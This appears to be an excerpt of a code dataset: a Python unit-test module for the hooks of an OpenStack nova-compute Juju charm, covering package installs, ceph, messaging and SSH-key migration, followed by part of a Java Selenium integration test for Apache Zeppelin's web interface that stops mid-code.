from nova_compute_hooks import update_nrpe_config
from test_utils import CharmTestCase
with patch('charmhelpers.contrib.hardening.harden.harden') as mock_dec:
mock_dec.side_effect = (lambda *dargs, **dkwargs: lambda f:
lambda *args, **kwargs: f(*args, **kwargs))
with patch("nova_compute_utils.restart_map"):
with patch("nova_compute_utils.register_configs"):
import nova_compute_hooks as hooks
importlib.reload(hooks)
TO_PATCH = [
# charmhelpers.core.hookenv
'Hooks',
'config',
'local_unit',
'log',
'is_relation_made',
'relation_get',
'relation_ids',
'relation_set',
'service_name',
'related_units',
'remote_service_name',
# charmhelpers.core.host
'apt_install',
'apt_purge',
'apt_update',
'filter_installed_packages',
'restart_on_change',
'service_restart',
# charmhelpers.contrib.openstack.utils
'configure_installation_source',
'openstack_upgrade_available',
# charmhelpers.contrib.network.ip
'get_relation_ip',
# nova_compute_context
'nova_metadata_requirement',
# nova_compute_utils
# 'PACKAGES',
'create_libvirt_secret',
'restart_map',
'determine_packages',
'import_authorized_keys',
'import_keystone_ca_cert',
'initialize_ssh_keys',
'migration_enabled',
'do_openstack_upgrade',
'public_ssh_key',
'register_configs',
'disable_shell',
'enable_shell',
'update_nrpe_config',
'network_manager',
'libvirt_daemon',
'configure_local_ephemeral_storage',
# misc_utils
'ensure_ceph_keyring',
'execd_preinstall',
'assert_libvirt_rbd_imagebackend_allowed',
'is_request_complete',
'send_request_if_needed',
'remove_libvirt_network',
# socket
'gethostname',
'create_sysctl',
'install_hugepages',
'uuid',
# unitdata
'unitdata',
# templating
'render',
'remove_old_packages',
'services',
]
class NovaComputeRelationsTests(CharmTestCase):
def setUp(self):
super(NovaComputeRelationsTests, self).setUp(hooks,
TO_PATCH)
self.config.side_effect = self.test_config.get
self.filter_installed_packages.side_effect = \
MagicMock(side_effect=lambda pkgs: pkgs)
self.gethostname.return_value = 'testserver'
self.get_relation_ip.return_value = '10.0.0.50'
def test_install_hook(self):
repo = 'cloud:precise-grizzly'
self.test_config.set('openstack-origin', repo)
self.determine_packages.return_value = ['foo', 'bar']
hooks.install()
self.configure_installation_source.assert_called_with(repo)
self.assertTrue(self.apt_update.called)
self.apt_install.assert_called_with(['foo', 'bar'], fatal=True)
self.assertTrue(self.execd_preinstall.called)
@patch.object(hooks, 'ceph_changed')
@patch.object(hooks, 'neutron_plugin_joined')
def test_config_changed_with_upgrade(self, neutron_plugin_joined,
ceph_changed):
self.openstack_upgrade_available.return_value = True
def rel_ids(x):
return {'neutron-plugin': ['rid1'],
'ceph': ['ceph:0']}.get(x, [])
self.relation_ids.side_effect = rel_ids
self.related_units.return_value = ['ceph/0']
self.migration_enabled.return_value = False
hooks.config_changed()
self.assertTrue(self.do_openstack_upgrade.called)
neutron_plugin_joined.assert_called_with('rid1', remote_restart=True)
ceph_changed.assert_called_with(rid='ceph:0', unit='ceph/0')
self.configure_local_ephemeral_storage.assert_called_once_with()
def test_config_changed_with_openstack_upgrade_action(self):
self.openstack_upgrade_available.return_value = True
self.test_config.set('action-managed-upgrade', True)
self.migration_enabled.return_value = False
hooks.config_changed()
self.assertFalse(self.do_openstack_upgrade.called)
@patch.object(hooks, 'neutron_plugin_joined')
@patch.object(hooks, 'compute_joined')
def test_config_changed_with_migration(self, compute_joined,
neutron_plugin_joined):
self.migration_enabled.return_value = True
self.test_config.set('migration-auth-type', 'ssh')
self.relation_ids.return_value = [
'cloud-compute:0',
'cloud-compute:1'
]
hooks.config_changed()
ex = [
call('cloud-compute:0'),
call('cloud-compute:1'),
]
self.assertEqual(ex, compute_joined.call_args_list)
self.assertTrue(self.initialize_ssh_keys.called)
@patch.object(hooks, 'neutron_plugin_joined')
@patch.object(hooks, 'compute_joined')
def test_config_changed_with_resize(self, compute_joined,
neutron_plugin_joined):
self.test_config.set('enable-resize', True)
self.migration_enabled.return_value = False
self.relation_ids.return_value = [
'cloud-compute:0',
'cloud-compute:1'
]
hooks.config_changed()
ex = [
call('cloud-compute:0'),
call('cloud-compute:1'),
]
self.assertEqual(ex, compute_joined.call_args_list)
self.initialize_ssh_keys.assert_called_with(user='nova')
self.enable_shell.assert_called_with(user='nova')
@patch.object(hooks, 'neutron_plugin_joined')
@patch.object(hooks, 'compute_joined')
def test_config_changed_without_resize(self, compute_joined,
neutron_plugin_joined):
self.test_config.set('enable-resize', False)
self.migration_enabled.return_value = False
self.relation_ids.return_value = [
'cloud-compute:0',
'cloud-compute:1'
]
hooks.config_changed()
ex = [
call('cloud-compute:0'),
call('cloud-compute:1'),
]
self.assertEqual(ex, compute_joined.call_args_list)
self.disable_shell.assert_called_with(user='nova')
@patch.object(hooks, 'compute_joined')
def test_config_changed_no_upgrade_no_migration(self, compute_joined):
self.openstack_upgrade_available.return_value = False
self.migration_enabled.return_value = False
hooks.config_changed()
self.assertFalse(self.do_openstack_upgrade.called)
self.assertFalse(compute_joined.called)
@patch.object(hooks, 'compute_joined')
def test_config_changed_with_sysctl(self, compute_joined):
self.migration_enabled.return_value = False
self.test_config.set(
'sysctl',
'{ kernel.max_pid : "1337", vm.swappiness : 10 }')
hooks.config_changed()
self.create_sysctl.assert_called_with(
"{kernel.max_pid: '1337', vm.swappiness: 10}\n",
'/etc/sysctl.d/50-nova-compute.conf')
@patch.object(hooks, 'compute_joined')
def test_config_changed_with_sysctl_swappy_default(self, compute_joined):
self.test_config.set(
'sysctl',
'{ kernel.max_pid : "1337" }')
self.migration_enabled.return_value = False
hooks.config_changed()
self.create_sysctl.assert_called_with(
"{kernel.max_pid: '1337', vm.swappiness: 1}\n",
'/etc/sysctl.d/50-nova-compute.conf')
@patch.object(hooks, 'compute_joined')
def test_config_changed_no_nrpe(self, compute_joined):
self.openstack_upgrade_available.return_value = False
self.migration_enabled.return_value = False
self.is_relation_made.return_value = False
hooks.config_changed()
self.assertFalse(self.update_nrpe_config.called)
@patch.object(hooks, 'compute_joined')
def test_config_changed_nrpe(self, compute_joined):
self.openstack_upgrade_available.return_value = False
self.migration_enabled.return_value = False
self.is_relation_made.return_value = True
hooks.config_changed()
self.assertTrue(self.update_nrpe_config.called)
@patch.object(hooks, 'compute_joined')
def test_config_changed_invalid_migration(self, compute_joined):
self.migration_enabled.return_value = True
self.test_config.set('migration-auth-type', 'none')
with self.assertRaises(Exception) as context:
hooks.config_changed()
self.assertEqual(
context.exception.message,
'Invalid migration-auth-type')
@patch.object(hooks, 'compute_joined')
def test_config_changed_use_multipath_false(self,
compute_joined):
self.test_config.set('use-multipath', False)
hooks.config_changed()
self.assertEqual(self.filter_installed_packages.call_count, 0)
@patch.object(hooks, 'compute_joined')
def test_config_changed_use_multipath_true(self,
compute_joined):
self.test_config.set('use-multipath', True)
self.filter_installed_packages.return_value = []
hooks.config_changed()
self.assertEqual(self.filter_installed_packages.call_count, 1)
self.apt_install.assert_called_with(hooks.MULTIPATH_PACKAGES,
fatal=True)
@patch('nova_compute_hooks.nrpe')
@patch('nova_compute_hooks.services')
@patch('charmhelpers.core.hookenv')
def test_nrpe_services_no_qemu_kvm(self, hookenv, services, nrpe):
'''
The qemu-kvm service is not monitored by NRPE, since it's one-shot.
'''
services.return_value = ['libvirtd', 'qemu-kvm', 'libvirt-bin']
update_nrpe_config()
nrpe.add_init_service_checks.assert_called_with(
ANY, ['libvirtd', 'libvirt-bin'], ANY)
def test_amqp_joined(self):
hooks.amqp_joined()
self.relation_set.assert_called_with(
username='nova', vhost='openstack',
relation_id=None)
@patch.object(hooks, 'CONFIGS')
def test_amqp_changed_missing_relation_data(self, configs):
configs.complete_contexts = MagicMock()
configs.complete_contexts.return_value = []
hooks.amqp_changed()
self.log.assert_called_with(
'amqp relation incomplete. Peer not ready?'
)
def _amqp_test(self, configs, neutron=False):
configs.complete_contexts = MagicMock()
configs.complete_contexts.return_value = ['amqp']
configs.write = MagicMock()
hooks.amqp_changed()
@patch.object(hooks, 'CONFIGS')
def test_amqp_changed_with_data_no_neutron(self, configs):
self._amqp_test(configs)
self.assertEqual([call('/etc/nova/nova.conf')],
configs.write.call_args_list)
@patch.object(hooks, 'CONFIGS')
def test_image_service_missing_relation_data(self, configs):
configs.complete_contexts = MagicMock()
configs.complete_contexts.return_value = []
hooks.image_service_changed()
self.log.assert_called_with(
'image-service relation incomplete. Peer not ready?'
)
@patch.object(hooks, 'CONFIGS')
def test_image_service_with_relation_data(self, configs):
configs.complete_contexts = MagicMock()
configs.write = MagicMock()
configs.complete_contexts.return_value = ['image-service']
hooks.image_service_changed()
configs.write.assert_called_with('/etc/nova/nova.conf')
def test_compute_joined_no_migration_no_resize(self):
self.migration_enabled.return_value = False
hooks.compute_joined()
self.assertFalse(self.relation_set.called)
def test_compute_joined_with_ssh_migration(self):
self.migration_enabled.return_value = True
self.test_config.set('migration-auth-type', 'ssh')
self.public_ssh_key.return_value = 'foo'
hooks.compute_joined()
self.relation_set.assert_called_with(**{
'relation_id': None,
'ssh_public_key': 'foo',
'migration_auth_type': 'ssh',
'hostname': 'testserver',
'private-address': '10.0.0.50',
})
hooks.compute_joined(rid='cloud-compute:2')
self.relation_set.assert_called_with(**{
'relation_id': 'cloud-compute:2',
'ssh_public_key': 'foo',
'migration_auth_type': 'ssh',
'hostname': 'testserver',
'private-address': '10.0.0.50',
})
def test_compute_joined_with_resize(self):
self.migration_enabled.return_value = False
self.test_config.set('enable-resize', True)
self.public_ssh_key.return_value = 'bar'
hooks.compute_joined()
self.relation_set.assert_called_with(**{
'relation_id': None,
'nova_ssh_public_key': 'bar',
'hostname': 'testserver',
'private-address': '10.0.0.50',
})
hooks.compute_joined(rid='cloud-compute:2')
self.relation_set.assert_called_with(**{
'relation_id': 'cloud-compute:2',
'nova_ssh_public_key': 'bar',
'hostname': 'testserver',
'private-address': '10.0.0.50',
})
def test_compute_changed(self):
hooks.compute_changed()
self.assertTrue(self.import_keystone_ca_cert.called)
self.import_authorized_keys.assert_has_calls([
call(),
call(user='nova', prefix='nova'),
])
def test_compute_changed_nonstandard_authorized_keys_path(self):
self.migration_enabled.return_value = False
self.test_config.set('enable-resize', True)
hooks.compute_changed()
self.import_authorized_keys.assert_called_with(
user='nova',
prefix='nova',
)
def test_ceph_joined(self):
self.libvirt_daemon.return_value = 'libvirt-bin'
hooks.ceph_joined()
self.apt_install.assert_called_with(['ceph-common'], fatal=True)
self.service_restart.assert_called_with('libvirt-bin')
self.libvirt_daemon.assert_called()
@patch.object(hooks, 'CONFIGS')
def test_ceph_changed_missing_relation_data(self, configs):
configs.complete_contexts = MagicMock()
configs.complete_contexts.return_value = []
hooks.ceph_changed()
self.log.assert_called_with(
'ceph relation incomplete. Peer not ready?'
)
@patch.object(hooks, 'CONFIGS')
def test_ceph_changed_no_keyring(self, configs):
configs.complete_contexts = MagicMock()
configs.complete_contexts.return_value = ['ceph']
self.ensure_ceph_keyring.return_value = False
hooks.ceph_changed()
self.log.assert_called_with(
'Could not create ceph keyring: peer not ready?'
)
@patch.object(hooks, 'mark_broker_action_done')
@patch.object(hooks, 'is_broker_action_done')
@patch('nova_compute_context.service_name')
@patch.object(hooks, 'CONFIGS')
def test_ceph_changed_with_key_and_relation_data(self, configs,
service_name,
is_broker_action_done,
mark_broker_action_done):
self.test_config.set('libvirt-image-backend', 'rbd')
self.is_request_complete.return_value = True
self.assert_libvirt_rbd_imagebackend_allowed.return_value = True
configs.complete_contexts = MagicMock()
configs.complete_contexts.return_value = ['ceph']
configs.write = MagicMock()
service_name.return_value = 'nova-compute'
self.ensure_ceph_keyring.return_value = True
is_broker_action_done.return_value = False
hooks.ceph_changed()
self.assertTrue(mark_broker_action_done.called)
ex = [
call('/var/lib/charm/nova-compute/ceph.conf'),
call('/etc/ceph/secret.xml'),
call('/etc/nova/nova.conf'),
]
self.assertEqual(ex, configs.write.call_args_list)
self.service_restart.assert_called_with('nova-compute')
is_broker_action_done.return_value = True
mark_broker_action_done.reset_mock()
hooks.ceph_changed()
self.assertFalse(mark_broker_action_done.called)
@patch('charmhelpers.contrib.storage.linux.ceph.CephBrokerRq'
'.add_op_request_access_to_group')
@patch('charmhelpers.contrib.storage.linux.ceph.CephBrokerRq'
'.add_op_create_pool')
def test_get_ceph_request(self, mock_create_pool,
mock_request_access):
self.assert_libvirt_rbd_imagebackend_allowed.return_value = True
self.test_config.set('rbd-pool', 'nova')
self.test_config.set('ceph-osd-replication-count', 3)
self.test_config.set('ceph-pool-weight', 28)
hooks.get_ceph_request()
mock_create_pool.assert_not_called()
mock_request_access.assert_not_called()
@patch('charmhelpers.contrib.storage.linux.ceph.CephBrokerRq'
'.add_op_request_access_to_group')
@patch('charmhelpers.contrib.storage.linux.ceph.CephBrokerRq'
'.add_op_create_pool')
def test_get_ceph_request_rbd(self, mock_create_pool,
mock_request_access):
self.assert_libvirt_rbd_imagebackend_allowed.return_value = True
self.test_config.set('rbd-pool', 'nova')
self.test_config.set('ceph-osd-replication-count', 3)
self.test_config.set('ceph-pool-weight', 28)
self.test_config.set('libvirt-image-backend', 'rbd')
hooks.get_ceph_request()
mock_create_pool.assert_called_with(name='nova', replica_count=3,
weight=28,
group='vms')
mock_request_access.assert_not_called()
@patch('charmhelpers.contrib.storage.linux.ceph.CephBrokerRq'
'.add_op_request_access_to_group')
@patch('charmhelpers.contrib.storage.linux.ceph.CephBrokerRq'
'.add_op_create_pool')
def test_get_ceph_request_perms(self, mock_create_pool,
mock_request_access):
self.assert_libvirt_rbd_imagebackend_allowed.return_value = True
self.test_config.set('rbd-pool', 'nova')
self.test_config.set('ceph-osd-replication-count', 3)
self.test_config.set('ceph-pool-weight', 28)
self.test_config.set('libvirt-image-backend', 'rbd')
self.test_config.set('restrict-ceph-pools', True)
hooks.get_ceph_request()
mock_create_pool.assert_called_with(name='nova', replica_count=3,
weight=28,
group='vms')
mock_request_access.assert_has_calls([
call(name='volumes',
object_prefix_permissions={'class-read': ['rbd_children']},
permission='rwx'),
call(name='images',
object_prefix_permissions={'class-read': ['rbd_children']},
permission='rwx'),
call(name='vms',
object_prefix_permissions={'class-read': ['rbd_children']},
permission='rwx'),
])
@patch.object(hooks, 'service_restart_handler')
@patch.object(hooks, 'CONFIGS')
def test_neutron_plugin_changed(self, configs,
service_restart_handler):
self.nova_metadata_requirement.return_value = (True,
'sharedsecret')
hooks.neutron_plugin_changed()
self.assertTrue(self.apt_update.called)
self.apt_install.assert_called_with(['nova-api-metadata'],
fatal=True)
configs.write.assert_called_with('/etc/nova/nova.conf')
service_restart_handler.assert_called_with(
default_service='nova-compute')
@patch.object(hooks, 'service_restart_handler')
@patch.object(hooks, 'CONFIGS')
def test_neutron_plugin_changed_nometa(self, configs,
service_restart_handler):
self.nova_metadata_requirement.return_value = (False, None)
hooks.neutron_plugin_changed()
self.apt_purge.assert_called_with('nova-api-metadata',
fatal=True)
configs.write.assert_called_with('/etc/nova/nova.conf')
service_restart_handler.assert_called_with(
default_service='nova-compute')
@patch.object(hooks, 'service_restart_handler')
@patch.object(hooks, 'CONFIGS')
def test_neutron_plugin_changed_meta(self, configs,
service_restart_handler):
self.nova_metadata_requirement.return_value = (True, None)
hooks.neutron_plugin_changed()
self.apt_install.assert_called_with(['nova-api-metadata'],
fatal=True)
configs.write.assert_called_with('/etc/nova/nova.conf')
service_restart_handler.assert_called_with(
default_service='nova-compute')
@patch.object(hooks, 'get_hugepage_number')
def test_neutron_plugin_joined_relid(self, get_hugepage_number):
get_hugepage_number.return_value = None
hooks.neutron_plugin_joined(relid='relid23')
expect_rel_settings = {
'hugepage_number': None,
'default_availability_zone': 'nova',
}
self.relation_set.assert_called_with(
relation_id='relid23',
**expect_rel_settings
)
@patch('os.environ.get')
@patch.object(hooks, 'get_hugepage_number')
def test_neutron_plugin_joined_relid_juju_az(self,
get_hugepage_number,
mock_env_get):
self.test_config.set('customize-failure-domain', True)
def environ_get_side_effect(key):
return {
'JUJU_AVAILABILITY_ZONE': 'az1',
}[key]
mock_env_get.side_effect = environ_get_side_effect
get_hugepage_number.return_value = None
hooks.neutron_plugin_joined(relid='relid23')
expect_rel_settings = {
'hugepage_number': None,
'default_availability_zone': 'az1',
}
self.relation_set.assert_called_with(
relation_id='relid23',
**expect_rel_settings
)
@patch.object(hooks, 'get_hugepage_number')
def test_neutron_plugin_joined_huge(self, get_hugepage_number):
get_hugepage_number.return_value = 12
hooks.neutron_plugin_joined()
expect_rel_settings = {
'hugepage_number': 12,
'default_availability_zone': 'nova',
}
self.relation_set.assert_called_with(
relation_id=None,
**expect_rel_settings
)
@patch.object(hooks, 'get_hugepage_number')
def test_neutron_plugin_joined_remote_restart(self, get_hugepage_number):
get_hugepage_number.return_value = None
self.uuid.uuid4.return_value = 'e030b959-7207'
hooks.neutron_plugin_joined(remote_restart=True)
expect_rel_settings = {
'hugepage_number': None,
'restart-trigger': 'e030b959-7207',
'default_availability_zone': 'nova',
}
self.relation_set.assert_called_with(
relation_id=None,
**expect_rel_settings
)
@patch.object(hooks, 'is_unit_paused_set')
def test_service_restart_handler(self,
is_unit_paused_set):
self.relation_get.return_value = None
mock_kv = MagicMock()
mock_kv.get.return_value = None
self.unitdata.kv.return_value = mock_kv
hooks.service_restart_handler(default_service='foorbar')
self.relation_get.assert_called_with(
attribute='restart-nonce',
unit=None,
rid=None
)
is_unit_paused_set.assert_not_called()
@patch.object(hooks, 'is_unit_paused_set')
def test_service_restart_handler_with_service(self,
is_unit_paused_set):
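        # relation_get returns the restart nonce first, then the remote service name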
self.relation_get.side_effect = ['nonce', 'foobar-service']
mock_kv = MagicMock()
mock_kv.get.return_value = None
self.unitdata.kv.return_value = mock_kv
is_unit_paused_set.return_value = False
hooks.service_restart_handler()
self.relation_get.assert_has_calls([
call(attribute='restart-nonce',
unit=None,
rid=None),
call(attribute='remote-service',
unit=None,
rid=None),
])
self.service_restart.assert_called_with('foobar-service')
mock_kv.set.assert_called_with('restart-nonce',
'nonce')
self.assertTrue(mock_kv.flush.called)
@patch.object(hooks, 'is_unit_paused_set')
def test_service_restart_handler_when_paused(self,
is_unit_paused_set):
self.relation_get.side_effect = ['nonce', 'foobar-service']
mock_kv = MagicMock()
mock_kv.get.return_value = None
self.unitdata.kv.return_value = mock_kv
is_unit_paused_set.return_value = True
hooks.service_restart_handler()
self.relation_get.assert_has_calls([
call(attribute='restart-nonce',
unit=None,
rid=None),
])
self.service_restart.assert_not_called()
mock_kv.set.assert_called_with('restart-nonce',
'nonce')
self.assertTrue(mock_kv.flush.called)
def test_ceph_access_incomplete(self):
self.relation_get.return_value = None
self.test_config.set('virt-type', 'kvm')
hooks.ceph_access()
self.relation_get.assert_has_calls([
call('key', None, None),
call('secret-uuid', None, None),
])
self.render.assert_not_called()
self.create_libvirt_secret.assert_not_called()
def test_ceph_access_lxd(self):
self.relation_get.side_effect = ['mykey', 'uuid2']
self.remote_service_name.return_value = 'cinder-ceph'
self.test_config.set('virt-type', 'lxd')
hooks.ceph_access()
self.relation_get.assert_has_calls([
call('key', None, None),
call('secret-uuid', None, None),
])
self.render.assert_not_called()
self.create_libvirt_secret.assert_not_called()
self.ensure_ceph_keyring.assert_called_with(
service='cinder-ceph',
user='nova',
group='nova',
key='mykey'
)
def test_ceph_access_complete(self):
self.relation_get.side_effect = ['mykey', 'uuid2']
self.remote_service_name.return_value = 'cinder-ceph'
self.test_config.set('virt-type', 'kvm')
hooks.ceph_access()
self.relation_get.assert_has_calls([
call('key', None, None),
call('secret-uuid', None, None),
])
self.render.assert_called_with(
'secret.xml',
'/etc/ceph/secret-cinder-ceph.xml',
context={'ceph_secret_uuid': 'uuid2',
'service_name': 'cinder-ceph'}
)
self.create_libvirt_secret.assert_called_with(
secret_file='/etc/ceph/secret-cinder-ceph.xml',
secret_uuid='uuid2',
key='mykey',
)
self.ensure_ceph_keyring.assert_called_with(
service='cinder-ceph',
user='nova',
group='nova',
key='mykey'
)
def test_secrets_storage_relation_joined(self):
self.get_relation_ip.return_value = '10.23.1.2'
self.gethostname.return_value = 'testhost'
hooks.secrets_storage_joined()
self.get_relation_ip.assert_called_with('secrets-storage')
self.relation_set.assert_called_with(
relation_id=None,
secret_backend='charm-vaultlocker',
isolated=True,
access_address='10.23.1.2',
hostname='testhost'
)
self.gethostname.assert_called_once_with()
    def test_secrets_storage_relation_changed(self):
self.relation_get.return_value = None
hooks.secrets_storage_changed()
self.configure_local_ephemeral_storage.assert_called_once_with()
def test_cloud_credentials_joined(self):
self.local_unit.return_value = 'nova-compute-cell1/2'
hooks.cloud_credentials_joined()
self.relation_set.assert_called_with(username='nova_compute_cell1')
@patch.object(hooks, 'CONFIGS')
def test_cloud_credentials_changed(self, mock_CONFIGS):
hooks.cloud_credentials_changed()
mock_CONFIGS.write.assert_called_with('/etc/nova/nova.conf')
@patch.object(hooks.grp, 'getgrnam')
def test_upgrade_charm(self, getgrnam):
grp_mock = MagicMock()
grp_mock.gr_gid = None
getgrnam.return_value = grp_mock
self.remove_old_packages.return_value = False
hooks.upgrade_charm()
self.remove_old_packages.assert_called_once_with()
self.assertFalse(self.service_restart.called)
@patch.object(hooks.grp, 'getgrnam')
def test_upgrade_charm_purge(self, getgrnam):
grp_mock = MagicMock()
grp_mock.gr_gid = None
getgrnam.return_value = grp_mock
self.remove_old_packages.return_value = True
self.services.return_value = ['nova-compute']
hooks.upgrade_charm()
self.remove_old_packages.assert_called_once_with()
self.service_restart.assert_called_once_with('nova-compute')
|
[] |
[] |
[] |
[]
|
[]
|
python
| 0 | 0 | |
zeppelin-server/src/test/java/org/apache/zeppelin/ZeppelinIT.java
|
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.zeppelin;
import static org.junit.Assert.fail;
import org.junit.Test;
import org.openqa.selenium.By;
import org.openqa.selenium.TimeoutException;
import org.openqa.selenium.WebDriver;
import org.openqa.selenium.chrome.ChromeDriver;
import org.openqa.selenium.firefox.FirefoxBinary;
import org.openqa.selenium.firefox.FirefoxDriver;
import org.openqa.selenium.firefox.FirefoxProfile;
import org.openqa.selenium.safari.SafariDriver;
import org.openqa.selenium.support.ui.ExpectedCondition;
import org.openqa.selenium.support.ui.WebDriverWait;
public class ZeppelinIT {
private WebDriver getWebDriver(){
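    // Try Firefox first, then Chrome, then Safari; the first driver that can be created is used.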
WebDriver driver = null;
if (driver==null){
try {
FirefoxBinary ffox = new FirefoxBinary();
if ("true".equals(System.getenv("TRAVIS"))) {
ffox.setEnvironmentProperty("DISPLAY", ":99"); // xvfb is supposed to run with DISPLAY 99
}
FirefoxProfile profile = new FirefoxProfile();
driver = new FirefoxDriver(ffox, profile);
} catch (Exception e){
}
}
if (driver==null){
try {
driver = new ChromeDriver();
} catch (Exception e){
}
}
if (driver==null){
try {
driver = new SafariDriver();
} catch (Exception e){
}
}
String url;
if (System.getProperty("url")!=null) {
url = System.getProperty("url");
} else {
url = "http://localhost:8080";
}
long start = System.currentTimeMillis();
boolean loaded = false;
driver.get(url);
while (System.currentTimeMillis() - start < 60*1000) {
// wait for page load
try {
(new WebDriverWait(driver, 5)).until(new ExpectedCondition<Boolean>() {
@Override
public Boolean apply(WebDriver d) {
return d.findElement(By.partialLinkText("Start")).isDisplayed();
}
});
loaded = true;
break;
} catch (TimeoutException e){
driver.navigate().to(url);
}
}
    if (!loaded) {
fail();
}
return driver;
}
@Test
public void testDisableIT(){
//
}
/*
@Test
public void testRunSimpleQueryInNewSession() {
// Notice that the remainder of the code relies on the interface,
// not the implementation.
WebDriver driver = getWebDriver();
try {
// click start
WebElement start = driver.findElement(By.partialLinkText("Start"));
start.click();
// Wait for the page to load, timeout after 10 seconds
(new WebDriverWait(driver, 10)).until(new ExpectedCondition<Boolean>() {
public Boolean apply(WebDriver d) {
return d.findElement(By.linkText("Create new Job")).isDisplayed();
}
});
// click new
driver.findElement(By.linkText("Create new Job")).click();
// wait for run button appears
(new WebDriverWait(driver, 10)).until(new ExpectedCondition<Boolean>() {
public Boolean apply(WebDriver d) {
return d.findElement(By.linkText("Run")).isDisplayed();
}
});
// type some query
driver.findElement(By.xpath("//div[@id='zqlEditor']//textarea")).sendKeys("create table if not exists test "+Keys.chord(Keys.SHIFT, "9")+"id STRING);\n");
driver.findElement(By.xpath("//div[@id='zqlEditor']//textarea")).sendKeys("\nshow tables;");
// press run button
driver.findElement(By.linkText("Run")).click();
// wait for button becomes Running ...
(new WebDriverWait(driver, 10)).until(new ExpectedCondition<Boolean>() {
public Boolean apply(WebDriver d) {
return d.findElement(By.xpath("//div//a[text()='Running ...']")).isDisplayed();
}
});
// wait for button becomes Run
(new WebDriverWait(driver, 60)).until(new ExpectedCondition<Boolean>() {
public Boolean apply(WebDriver d) {
return d.findElement(By.xpath("//div//a[text()='Run']")).isDisplayed();
}
});
WebElement msg = driver.findElement(By.id("msgBox"));
if (msg!=null) {
System.out.println("msgBox="+msg.getText());
}
// wait for visualization
(new WebDriverWait(driver, 20)).until(new ExpectedCondition<Boolean>() {
public Boolean apply(WebDriver d) {
return d.findElement(By.xpath("//div[@id='visualizationContainer']//iframe")).isDisplayed();
}
});
WebDriver iframe = driver.switchTo().frame(driver.findElement(By.xpath("//div[@id='visualizationContainer']//iframe")));
// wait for result displayed
(new WebDriverWait(iframe, 20)).until(new ExpectedCondition<Boolean>() {
public Boolean apply(WebDriver d) {
return d.findElement(By.xpath("//table//td[text()='test']")).isDisplayed();
}
});
} catch (WebDriverException e){
File scrFile = ((TakesScreenshot)driver).getScreenshotAs(OutputType.FILE);
System.out.println("Screenshot in: " + scrFile.getAbsolutePath());
throw e;
} finally {
// Close the browser
driver.quit();
}
}
*/
/**
* Get the url of Zeppelin
*
* @param path to add to the url ex: HOST/myPath
* @return Zeppelin url HOST:PORT{/PATH}
*/
private String getUrl(String path) {
String url;
if (System.getProperty("url") != null) {
url = System.getProperty("url");
} else {
url = "http://localhost:8080";
}
if (path != null)
url += path;
return url;
}
/*
@Test
public void testZAN() {
WebDriver driver = getWebDriver();
try {
// goto ZAN menu
driver.findElement(By.xpath("//ul//a[text()='ZAN']")).click();
// wait for ZAN page loaded
(new WebDriverWait(driver, 20)).until(new ExpectedCondition<Boolean>() {
public Boolean apply(WebDriver d) {
return d.findElement(By.xpath("//div//a[text()='Update Catalog']")).isDisplayed();
}
});
} catch (WebDriverException e) {
File scrFile = ((TakesScreenshot) driver)
.getScreenshotAs(OutputType.FILE);
System.out.println("Screenshot in: " + scrFile.getAbsolutePath());
throw e;
} finally {
// Close the browser
driver.quit();
}
}
*/
/**
 * Test if swagger-ui is started
*/
/*
@Test
public void testSwaggerDocumentation() {
WebDriver driver = getWebDriver();
try {
driver.get(getUrl("/docs"));
// wait for Swagger page loaded
(new WebDriverWait(driver, 20)).until(new ExpectedCondition<Boolean>() {
public Boolean apply(WebDriver d) {
return d.findElement(By.xpath("//div//input[@id='input_apiKey']")).isDisplayed();
}
});
} catch (WebDriverException ex) {
File scrFile = ((TakesScreenshot) driver).getScreenshotAs(OutputType.FILE);
System.out.println("Screenshot in: " + scrFile.getAbsolutePath());
throw ex;
} finally {
driver.close();
}
}
@Test
public void testAnnotationStmt() {
// Notice that the remainder of the code relies on the interface,
// not the implementation.
WebDriver driver = getWebDriver();
try {
// click start
WebElement start = driver.findElement(By.partialLinkText("Start"));
start.click();
// Wait for the page to load, timeout after 10 seconds
(new WebDriverWait(driver, 10)).until(new ExpectedCondition<Boolean>() {
public Boolean apply(WebDriver d) {
return d.findElement(By.linkText("Create new Job")).isDisplayed();
}
});
// click new
driver.findElement(By.linkText("Create new Job")).click();
// wait for run button appears
(new WebDriverWait(driver, 10)).until(new ExpectedCondition<Boolean>() {
public Boolean apply(WebDriver d) {
return d.findElement(By.linkText("Run")).isDisplayed();
}
});
// type some query with default driver
driver.findElement(By.xpath("//div[@id='zqlEditor']//textarea")).sendKeys("@driver set exec;");
driver.findElement(By.xpath("//div[@id='zqlEditor']//textarea")).sendKeys("\necho 'hello world';");
// press run button
driver.findElement(By.xpath("//div[@id='zqlEditor']//textarea")).sendKeys(Keys.chord(Keys.COMMAND, Keys.ENTER));
driver.findElement(By.xpath("//div[@id='zqlEditor']//textarea")).sendKeys(Keys.chord(Keys.CONTROL, Keys.ENTER));
driver.findElement(By.linkText("Run")).click();
// wait for button becomes Running ...
(new WebDriverWait(driver, 10)).until(new ExpectedCondition<Boolean>() {
public Boolean apply(WebDriver d) {
return d.findElement(By.xpath("//div//a[text()='Running ...']")).isDisplayed();
}
});
// wait for button becomes Run
(new WebDriverWait(driver, 60)).until(new ExpectedCondition<Boolean>() {
public Boolean apply(WebDriver d) {
return d.findElement(By.xpath("//div//a[text()='Run']")).isDisplayed();
}
});
WebElement msg = driver.findElement(By.id("msgBox"));
if (msg!=null) {
System.out.println("msgBox="+msg.getText());
}
// wait for visualization
(new WebDriverWait(driver, 20)).until(new ExpectedCondition<Boolean>() {
public Boolean apply(WebDriver d) {
return d.findElement(By.xpath("//div[@id='visualizationContainer']//iframe")).isDisplayed();
}
});
WebDriver iframe = driver.switchTo().frame(driver.findElement(By.xpath("//div[@id='visualizationContainer']//iframe")));
// wait for result displayed
(new WebDriverWait(iframe, 20)).until(new ExpectedCondition<Boolean>() {
public Boolean apply(WebDriver d) {
return d.findElement(By.xpath("//table//td[text()='hello world']")).isDisplayed();
}
});
} catch (WebDriverException e){
File scrFile = ((TakesScreenshot)driver).getScreenshotAs(OutputType.FILE);
